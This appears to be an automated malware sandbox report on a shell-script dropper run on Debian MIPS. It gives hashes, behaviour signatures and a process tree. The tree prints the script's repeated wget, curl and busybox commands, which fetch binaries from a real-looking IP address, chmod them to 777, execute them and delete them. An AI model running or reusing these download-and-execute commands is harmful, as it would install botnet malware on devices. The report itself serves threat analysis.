Analysis
-
max time kernel
147s -
max time network
152s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mips image:debian9-mipsbe-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system -
submitted
28/10/2024, 02:34
Static task
static1
Behavioral task
behavioral1
Sample
56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91.sh
-
Size
10KB
-
MD5
7b4d271e102cd41b604d6fea5d979e2d
-
SHA1
56b5d99bae8b5353d96d700fda3d30d396cc9828
-
SHA256
56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91
-
SHA512
ac1884092a54f7829359fccf4958bfc2add2cc2a89006fc0fadd30221a55d9c559a91e0a83747d00161c63e152fef77f819c20574cbd81fb4bdde05f1ed486c5
-
SSDEEP
192:C83Wep8P79w808A8uBpzuRtUltYv3WfjIK3qRtUlta808A8uBpKv3WfjaB83hP7W:Crep8P79w808A8uBpzyv3WfjIK38808f
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91.sh/tmp/56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91.sh1⤵PID:697
-
/bin/rm/bin/rm bins.sh2⤵PID:703
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms2⤵PID:705
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:711
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms2⤵PID:722
-
-
/bin/chmodchmod 777 GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms2⤵
- File and Directory Permissions Modification
PID:728
-
-
/tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms./GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms2⤵
- Executes dropped EXE
PID:729
-
-
/bin/rmrm GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms2⤵PID:730
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt2⤵PID:731
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:732
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt2⤵PID:733
-
-
/bin/chmodchmod 777 zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt2⤵
- File and Directory Permissions Modification
PID:734
-
-
/tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt./zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt2⤵
- Executes dropped EXE
PID:735
-
-
/bin/rmrm zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt2⤵PID:736
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF2⤵PID:737
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:738
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF2⤵PID:739
-
-
/bin/chmodchmod 777 xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF2⤵
- File and Directory Permissions Modification
PID:740
-
-
/tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF./xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF2⤵
- Executes dropped EXE
PID:741
-
-
/bin/rmrm xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF2⤵PID:742
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs2⤵PID:743
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:744
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs2⤵PID:748
-
-
/bin/chmodchmod 777 CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs2⤵
- File and Directory Permissions Modification
PID:749
-
-
/tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs./CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs2⤵
- Executes dropped EXE
PID:750
-
-
/bin/rmrm CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs2⤵PID:751
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa2⤵PID:753
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:757
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa2⤵PID:765
-
-
/bin/chmodchmod 777 jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa2⤵
- File and Directory Permissions Modification
PID:769
-
-
/tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa./jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa2⤵
- Executes dropped EXE
PID:770
-
-
/bin/rmrm jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa2⤵PID:773
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB2⤵PID:775
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:785
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB2⤵PID:794
-
-
/bin/chmodchmod 777 DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB2⤵
- File and Directory Permissions Modification
PID:799
-
-
/tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB./DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB2⤵
- Executes dropped EXE
PID:800
-
-
/bin/rmrm DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB2⤵PID:803
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S2⤵PID:804
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:810
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S2⤵PID:811
-
-
/bin/chmodchmod 777 ZaCmBj05noshx614szHWsFSt4WhLb0wu7S2⤵
- File and Directory Permissions Modification
PID:812
-
-
/tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S./ZaCmBj05noshx614szHWsFSt4WhLb0wu7S2⤵
- Executes dropped EXE
PID:813
-
-
/bin/rmrm ZaCmBj05noshx614szHWsFSt4WhLb0wu7S2⤵PID:814
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo2⤵PID:815
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:816
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo2⤵PID:817
-
-
/bin/chmodchmod 777 LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo2⤵
- File and Directory Permissions Modification
PID:820
-
-
/tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo./LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo2⤵
- Executes dropped EXE
PID:821
-
-
/bin/rmrm LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo2⤵PID:824
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K2⤵PID:825
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:832
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K2⤵PID:839
-
-
/bin/chmodchmod 777 OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K2⤵
- File and Directory Permissions Modification
PID:842
-
-
/tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K./OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K2⤵
- Executes dropped EXE
PID:843
-
-
/bin/rmrm OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K2⤵PID:846
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f2⤵
- System Network Configuration Discovery
PID:847
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:852
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f2⤵
- System Network Configuration Discovery
PID:858
-
-
/bin/chmodchmod 777 qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f2⤵
- File and Directory Permissions Modification
PID:860
-
-
/tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f./qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:861
-
-
/bin/rmrm qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f2⤵
- System Network Configuration Discovery
PID:862
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU2⤵PID:863
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:864
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU2⤵PID:865
-
-
/bin/chmodchmod 777 hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU2⤵
- File and Directory Permissions Modification
PID:866
-
-
/tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU./hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU2⤵
- Executes dropped EXE
PID:867
-
-
/bin/rmrm hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU2⤵PID:868
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD2⤵PID:869
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:870
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD2⤵PID:871
-
-
/bin/chmodchmod 777 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD2⤵
- File and Directory Permissions Modification
PID:872
-
-
/tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD./0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD2⤵
- Executes dropped EXE
PID:873
-
-
/bin/rmrm 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD2⤵PID:874
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF2⤵PID:875
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:876
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF2⤵PID:877
-
-
/bin/chmodchmod 777 waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF2⤵
- File and Directory Permissions Modification
PID:878
-
-
/tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF./waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF2⤵
- Executes dropped EXE
PID:879
-
-
/bin/rmrm waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF2⤵PID:880
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ02⤵PID:881
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:882
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ02⤵PID:883
-
-
/bin/chmodchmod 777 quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ02⤵
- File and Directory Permissions Modification
PID:884
-
-
/tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0./quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ02⤵
- Executes dropped EXE
PID:885
-
-
/bin/rmrm quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ02⤵PID:886
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K2⤵PID:887
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:888
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K2⤵PID:889
-
-
/bin/chmodchmod 777 OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K2⤵
- File and Directory Permissions Modification
PID:890
-
-
/tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K./OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K2⤵
- Executes dropped EXE
PID:891
-
-
/bin/rmrm OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K2⤵PID:892
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f2⤵
- System Network Configuration Discovery
PID:893
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:894
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f2⤵
- System Network Configuration Discovery
PID:895
-
-
/bin/chmodchmod 777 qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f2⤵
- File and Directory Permissions Modification
PID:896
-
-
/tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f./qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:897
-
-
/bin/rmrm qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f2⤵
- System Network Configuration Discovery
PID:898
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU2⤵PID:899
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:900
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU2⤵PID:901
-
-
/bin/chmodchmod 777 hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU2⤵
- File and Directory Permissions Modification
PID:902
-
-
/tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU./hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU2⤵
- Executes dropped EXE
PID:903
-
-
/bin/rmrm hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU2⤵PID:904
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo2⤵PID:905
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:906
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo2⤵PID:907
-
-
/bin/chmodchmod 777 LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo2⤵
- File and Directory Permissions Modification
PID:908
-
-
/tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo./LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo2⤵
- Executes dropped EXE
PID:909
-
-
/bin/rmrm LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo2⤵PID:910
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF2⤵PID:911
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:912
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF2⤵PID:913
-
-
/bin/chmodchmod 777 waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF2⤵
- File and Directory Permissions Modification
PID:914
-
-
/tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF./waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF2⤵
- Executes dropped EXE
PID:915
-
-
/bin/rmrm waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF2⤵PID:916
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ02⤵PID:917
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:918
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ02⤵PID:919
-
-
/bin/chmodchmod 777 quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ02⤵
- File and Directory Permissions Modification
PID:920
-
-
/tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0./quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ02⤵
- Executes dropped EXE
PID:921
-
-
/bin/rmrm quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ02⤵PID:922
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD2⤵PID:923
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:924
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD2⤵PID:925
-
-
/bin/chmodchmod 777 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD2⤵
- File and Directory Permissions Modification
PID:926
-
-
/tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD./0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD2⤵
- Executes dropped EXE
PID:927
-
-
/bin/rmrm 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD2⤵PID:928
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt2⤵PID:929
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:930
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt2⤵PID:932
-
-
/bin/chmodchmod 777 zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt2⤵
- File and Directory Permissions Modification
PID:933
-
-
/tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt./zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt2⤵
- Executes dropped EXE
PID:934
-
-
/bin/rmrm zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt2⤵PID:935
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF2⤵PID:936
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:937
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF2⤵PID:938
-
-
/bin/chmodchmod 777 xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF2⤵
- File and Directory Permissions Modification
PID:939
-
-
/tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF./xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF2⤵
- Executes dropped EXE
PID:940
-
-
/bin/rmrm xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF2⤵PID:941
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs2⤵PID:942
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:943
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs2⤵PID:944
-
-
/bin/chmodchmod 777 CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs2⤵
- File and Directory Permissions Modification
PID:945
-
-
/tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs./CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs2⤵
- Executes dropped EXE
PID:946
-
-
/bin/rmrm CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs2⤵PID:947
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa2⤵PID:948
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:949
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa2⤵PID:950
-
-
/bin/chmodchmod 777 jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa2⤵
- File and Directory Permissions Modification
PID:951
-
-
/tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa./jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa2⤵
- Executes dropped EXE
PID:952
-
-
/bin/rmrm jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa2⤵PID:953
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms2⤵PID:954
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:955
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms2⤵PID:956
-
-
/bin/chmodchmod 777 GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms2⤵
- File and Directory Permissions Modification
PID:957
-
-
/tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms./GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms2⤵
- Executes dropped EXE
PID:958
-
-
/bin/rmrm GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms2⤵PID:959
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB2⤵PID:960
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:961
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB2⤵PID:962
-
-
/bin/chmodchmod 777 DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB2⤵
- File and Directory Permissions Modification
PID:963
-
-
/tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB./DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB2⤵
- Executes dropped EXE
PID:964
-
-
/bin/rmrm DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB2⤵PID:965
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S2⤵PID:966
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:967
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S2⤵PID:968
-
-
/bin/chmodchmod 777 ZaCmBj05noshx614szHWsFSt4WhLb0wu7S2⤵
- File and Directory Permissions Modification
PID:969
-
-
/tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S./ZaCmBj05noshx614szHWsFSt4WhLb0wu7S2⤵
- Executes dropped EXE
PID:970
-
-
/bin/rmrm ZaCmBj05noshx614szHWsFSt4WhLb0wu7S2⤵PID:971
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97